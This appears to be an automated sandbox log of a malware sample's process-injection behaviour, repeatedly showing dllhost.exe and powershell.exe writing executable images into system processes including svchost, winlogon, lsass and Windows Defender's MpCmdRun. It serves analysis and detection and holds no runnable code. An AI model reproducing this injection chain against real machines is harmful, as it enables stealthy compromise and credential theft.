Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C7ADC40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 242997D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2910000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 15E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 22A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 29A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A8C180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 242BF650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2578F260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1B68BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E591C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2134E400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1A6A2460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1EB0CEB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 182A5970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 182A59A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4056 base: 8590000 value: 4D
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4056 base: 8D00000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7276Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7680Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 1188Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 1660Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: CA6708B010Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1EB0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287A7D0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000Jump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000Jump to behavior
